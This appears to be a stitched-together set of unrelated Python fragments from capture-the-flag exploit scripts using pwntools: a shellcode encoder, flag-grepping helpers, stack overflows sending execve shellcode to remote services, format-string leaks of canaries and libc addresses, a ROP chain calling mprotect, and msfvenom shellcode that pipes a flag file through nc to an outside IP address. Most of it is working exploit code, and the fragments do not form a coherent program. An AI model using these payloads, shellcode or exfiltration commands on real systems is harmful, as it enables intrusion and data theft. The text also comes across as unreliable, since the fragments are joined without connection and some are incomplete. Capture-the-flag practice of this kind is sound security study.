def encode(self,raw_sc,addr_in_reg='rax',pre_len=0,is_rdi_zero=0): r''' raw_sc:需要encode的机器码 addr_in_reg: 指向shellcode附近的寄存器名称,默认rax pre_len:因为默认rax指向shellcode附近,这个字段的意思为 reg+pre_len == encoder的起始地址,默认0 is_rdi_zero: 跑shellcode之前rdi是否为0,如果确定为0,可以设置此flag为1,这样可以省去几byte空间,默认0即rdi不为0 encoder_len:留给encoder的最大字节长度(会自动调整) 地址构成: rax --> xxxxx \ xxxxx | pre_len (adjust addr to rax) xxxxx / encoder yyyyy \ yyyyy | encoder_len yyyyy / your_sc zzzzz \ zzzzz | encoded shellcode zzzzz | zzzzz / ''' save_log_level = context.log_level context.log_level = 99 if not is_rdi_zero: self.prologue = self.zero_rdi+self.init_encoder else: self.prologue = self.init_encoder addr_in_reg=addr_in_reg.lower() if addr_in_reg != 'rax': if addr_in_reg not in self.vaild_reg: print '[-] not vaild reg' return None else: self.prologue=asm('push {};pop rax;\n'.format(addr_in_reg))+self.prologue self.raw_sc = raw_sc self.pre_len = pre_len self.encoder_len=len(self.prologue) if not self.encode_raw_sc(): print '[-] error while encoding raw_sc' return None while True: debug('AE64: trying length {}'.format(self.encoder_len)) encoder = asm(self.gen_encoder(self.pre_len+self.encoder_len)) final_sc = self.prologue+encoder if self.encoder_len >= len(final_sc) and self.encoder_len-len(final_sc) <= 6:# nop len break self.encoder_len=len(final_sc) nop_len = self.encoder_len - len(final_sc) context.log_level = save_log_level success('shellcode generated, length info -> prologue:{} + encoder:{} + nop:{} + encoded_sc:{} == {}'.format( len(self.prologue), len(final_sc)-len(self.prologue), nop_len, len(self.enc_raw_sc), len(final_sc)+nop_len+len(self.enc_raw_sc))) final_sc += self.nop2*(nop_len/2)+self.nop*(nop_len%2)+self.enc_raw_sc return final_sc
def testString(a, b): # {{{ src = a tgt = b if str(src) == str(tgt): pwn.success("{} est un palindrome".format(tgt)) else: pwn.warn("{} n'est pas un palindrome".format(tgt)) return # }}}
def FlagFinder(cible, flag): # {{{ regex = flag file = cible t = pwn.read(file) c = re.findall(regex, str(t)) if not c: pwn.warn("Flag non trouvé") else: for a in c: pwn.success("Yeah !!!! flag found: {result}\n".format(result=a)) pwn.warn("flag is now copied in flag.txt") pwn.write("flag.txt", a)
def Exploit(fichier, pattern): regex = pattern file = fichier pwn.info("Opening file: {fichier}\n".format(fichier=file)) s = pwn.read(file) pwn.info("Searching for pattern: {flag}\n".format(flag=regex)) c = re.findall(regex, str(s)) if not c: pwn.warn("No flag for you my friend, check your regex") else: for a in c: pwn.success("Yeah !!!! flag found: {result}\n".format(result=a)) pwn.warn("flag is now copied in flag.txt") pwn.write("flag.txt", a)
def Online(url, pattern): regex = pattern file = url pwn.info("Opening file: {fichier}\n".format(fichier=file)) r = requests.session() s = r.get(file) s = s.content pwn.info("Search for pattern: {flag}\n".format(flag=regex)) c = re.findall(regex, str(s)) if not c: pwn.warn("No flag for you my friend, check your regex") else: for a in c: pwn.success("Yeah !!!! flag found: {result}\n".format(result=a)) pwn.warn("flag is now copied in flag.txt") pwn.write("flag.txt", a)
def third_attempt(remote): length_before_return_address = 0x14 write_address = 0x08048087 payload = b'A' * length_before_return_address + pwn.p32(write_address) remote.send(payload) esp_bytes = 4 bytes_to_receive = 0x14 esp = pwn.u32(remote.recv(esp_bytes)) pwn.info('ESP was %d' % esp) remote.recv(bytes_to_receive - esp_bytes) # Not used # shellcode = pwn.asm(pwn.shellcraft.sh()) # too long, manually reduced below shellcode = pwn.asm( ''' push 0x68 push 0x732f2f2f push 0x6e69622f mov ebx, esp xor ecx, ecx xor edx, edx /* call execve() */ push 11 /* 0xb */ pop eax int 0x80 ''') payload = b'A' * length_before_return_address + \ pwn.p32(esp + length_before_return_address) + \ shellcode assert len(payload) <= 60, len(payload) remote.send(payload) remote.sendline('cat /home/start/flag') pwn.success('Flag is: %s' % remote.recvuntil('\n').rstrip().decode('utf8')) remote.interactive()
def leak(payload): headers = {"User-Agent": payload} params = {"toy": b64encode('fsb\0')} r = requests.get(URL, headers=headers, params=params) l = re.findall(r'''<br>\[GET\] / - (.*)</small></footer></body></html>''', r.text)[0].split('.') canary = int(l[0], 16) success("canary -> {:#x}".format(canary)) stack = int(l[1], 16) >> 12 << 12 success("stack -> {:#x}".format(stack)) libc.address = int(l[2], 16) - libc.sym['__libc_start_main'] - 231 success("libc -> {:#x}".format(libc.address)) return canary, stack
import pwn host = "192.168.1.251" port = 2999 r = pwn.remote(host, port) message = r.recvline().strip() number = int(message.decode().split("'")[1]) pwn.info(message) r.sendline(pwn.p32(number)) pwn.success(r.recvline().strip()) r.close()
filename="./db/"+sys.argv[1] inputbuf=sys.argv[2] check=0 if '&' in inputbuf: check=1 regs=inputbuf.replace("&"," ").split() else: regs=inputbuf.replace("|"," ").split() fp=open(filename,"r") while True: tmp=fp.readline() if not tmp or tmp=='\n': break res=json.loads(tmp[:-1]) if check: if res.get(regs[0])==0 and res.get(regs[1])==0: printbuf='' for i,j in res.items(): printbuf+=i+":"+hex(j)+" " printbuf+="\n" success(printbuf) else: if res.get(regs[0])==0 or res.get(regs[1])==0: printbuf='' for i,j in res.items(): printbuf+=i+":"+hex(j)+" " printbuf+="\n" success(printbuf) fp.close()
pwn.info("Round %d: Trying %d (+%d)" % (solved_rounds, next_number_to_try, i)) for round in range(0, 10): if round < solved_rounds: io.sendline(str(solution[round])) elif round == solved_rounds: io.sendline(str(next_number_to_try)) else: io.sendline(str(2 ** (round + 3))) io.recv() io.recvuntil('ok, lets run the experiment with your configuration\n') newlines_per_solved_round = 4 with pwn.context.local(log_level='error'): results = io.recvall() lines = results.strip().split(b'\n') progress_to_round = int(len(lines) / newlines_per_solved_round) - 1 if b'flag :' in results: pwn.success("Wooohooo. Found flag:\n%s " % lines[len(lines)-1].decode('utf8')) keep_running = False solved_round = True break if progress_to_round > solved_rounds: solution.append(next_number_to_try) solved_rounds += 1 pwn.success("Yay. Found solution for round %d: %d\nSolution so far: %s" % (solved_rounds, next_number_to_try, solution)) solved_round = True break assert solved_round
def get_absolute_stack_address_below_main(): offset = read_stack_offset(esp_placed_at_offset) pwn.success("Read offset: 0x%08x" % offset) return offset - (esp_placed_at_offset - main_ret_address_offset) * 4
def write_rop_chain_to_addr(addr, rop_chain): assert len(rop_chain) % 4 == 0 for x in range(0, int(len(rop_chain) / 4)): val = rop_chain[x * 4:(x + 1) * 4] val = pwn.u32(val) write_stack_offset(x + addr, val) mprotect_addr = exe.symbols['mprotect'] io = start() io.recvuntil("=== Welcome to SECPROG calculator ===\n") stack_addr = get_absolute_stack_address_below_main() stack_addr_mod_pagesize = stack_addr - (stack_addr % 4096) pwn.success("Stack absolute address is 0x%08x" % stack_addr) pwn.success("Stack absolute address mod pagesize is 0x%08x" % stack_addr_mod_pagesize) rop_chain = ( pwn.p32(mprotect_addr) + # return from calc, go to mprotect pwn.p32(stack_addr + 16) + # return address after mprotect, go to shellcode pwn.p32(stack_addr_mod_pagesize) + # mprotect param: addr pwn.p32(4096) + # mprotect param: page size pwn.p32(7) + # mprotect param: rwx pwn.asm(pwn.shellcraft.sh() ) # shellcode after stack has been marked executable ) pwn.debug("ROP chain:\n%s" % pwn.hexdump(rop_chain))
# msfvenom -p linux/x64/exec cmd="cat flag| nc 123.207.141.87 12345" -f python -v sc sc = "" sc += "\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68" sc += "\x00\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6" sc += "\x52\xe8\x22\x00\x00\x00\x63\x61\x74\x20\x66\x6c\x61" sc += "\x67\x7c\x20\x6e\x63\x20\x31\x32\x33\x2e\x32\x30\x37" sc += "\x2e\x31\x34\x31\x2e\x38\x37\x20\x31\x32\x33\x34\x35" sc += "\x00\x56\x57\x48\x89\xe6\x0f\x05" payload = fit( { 0x48: flat(canary), 0x58: flat(prdi, stack, prsi, 0x1000, prdx, 0x7, libc.sym['mprotect'], jrsp) }, filler='\0') payload += sc # raw_input("DEBUG: ") rop(payload) success("DONE") ''' 1. leak canary, stack address and libc.address using format string bug in router(); 2. with known canary and libc.address, we're able to ROP. 3. I just want to send my payload using requests.get(), so I make a mprotect(stack, 0x1000, 7) and using rop then jump to my shellcode. However, I've no idea why reverse_tcp shellcode failed. I guess it stucks in requests.get. Please kindly let me know if you know the answer. '''